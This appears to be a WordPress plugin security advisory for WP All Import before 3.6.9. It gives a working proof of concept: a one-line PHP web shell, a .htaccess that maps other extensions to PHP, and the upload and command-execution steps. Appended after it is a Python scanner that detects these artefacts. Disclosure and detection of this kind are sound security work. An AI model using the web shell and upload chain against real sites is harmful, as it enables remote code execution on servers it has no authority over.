WPEX-ID: CCBB74F5-1B8F-4EA6-96BC-DDF62AF7F94D
History: Oct 14, 2022 - 12:00 a.m.

WP All Import < 3.6.9 - Admin+ Arbitrary File Upload to RCE

2022-10-14 00:00:00
lucy
arbitrary file upload
remote code execution
wordpress security

EPSS: 0.001 (Low), Percentile: 45.0%

The plugin does not properly filter which file extensions are allowed to be imported onto the server, which could allow administrators in multi-site WordPress installations to upload arbitrary files.

[1] Create 'poc.zip' containing the 2 files below.

 [1-1] 'exploit.php.txt' is as follows.
 ----------------------------------
 <?php system($_GET['cmd']); ?>
 ----------------------------------

 [1-2] '.htaccess' is as follows.
 ----------------------------------
 <IfModule mod_rewrite.c>
 AddHandler application/x-httpd-php .php .html
 </IfModule>
 ----------------------------------

[2] Upload the 'poc.zip' via the button [Upload a file] on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import'

[3] Access 'http://localhost/wp-content/uploads/wpallimport/uploads/fa5b307edb3ccdd2244b2b60b1d9c0ee/exploit.php.txt?cmd=id' in order to execute arbitrary commands.
* fa5b307edb3ccdd2244b2b60b1d9c0ee is a random string from the server response.
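As an added defender's check (this script is not part of the advisory), the following Python walks a WP All Import uploads tree for the two artefacts the technique above leaves behind: a .htaccess that maps extra extensions to the PHP handler, and a double-extension name such as exploit.php.txt. The job-hash directory name and the file contents in the demo tree are constructed placeholders.

```python
import os
import re
import shutil
import tempfile
from pathlib import Path

# Directives that hand a file to the PHP handler, as the PoC .htaccess does.
HANDLER_RE = re.compile(r"^\s*(AddHandler|SetHandler|AddType)\b.*php", re.I | re.M)
# A PHP extension that is not the last one, e.g. exploit.php.txt (mod_mime honours every extension).
DOUBLE_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)\.", re.I)
PHP_EXTS = (".php", ".phtml", ".phar")


def scan_uploads(root):
    """Walk an uploads tree and return sorted (finding, path) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name == ".htaccess":
                try:
                    text = Path(path).read_text(errors="replace")
                except OSError:
                    continue
                if HANDLER_RE.search(text):
                    findings.append(("htaccess-php-handler", path))
            elif DOUBLE_EXT_RE.search(name):
                findings.append(("double-extension-php", path))
            elif name.lower().endswith(PHP_EXTS):
                findings.append(("php-in-uploads", path))
    return sorted(findings)


def run_demo():
    """Build a constructed tree mirroring the PoC layout, scan it, return the findings."""
    root = tempfile.mkdtemp(prefix="wpai-scan-")
    try:
        job = Path(root, "wpallimport", "uploads", "JOBHASH_PLACEHOLDER")  # placeholder hash
        job.mkdir(parents=True)
        (job / "exploit.php.txt").write_text("sample\n")  # the name, not the content, is flagged
        (job / ".htaccess").write_text(
            "<IfModule mod_rewrite.c>\nAddHandler application/x-httpd-php .php .html\n</IfModule>\n")
        benign = Path(root, "wpallimport", "uploads", "benign")
        benign.mkdir()
        (benign / "products.csv").write_text("sku,name\n1,widget\n")
        (benign / ".htaccess").write_text("Options -Indexes\n")  # harmless, must not be flagged
        return scan_uploads(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)
```

Point scan_uploads() at a real wp-content/uploads/wpallimport directory to audit it; any .htaccess there should normally contain no handler directives at all.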
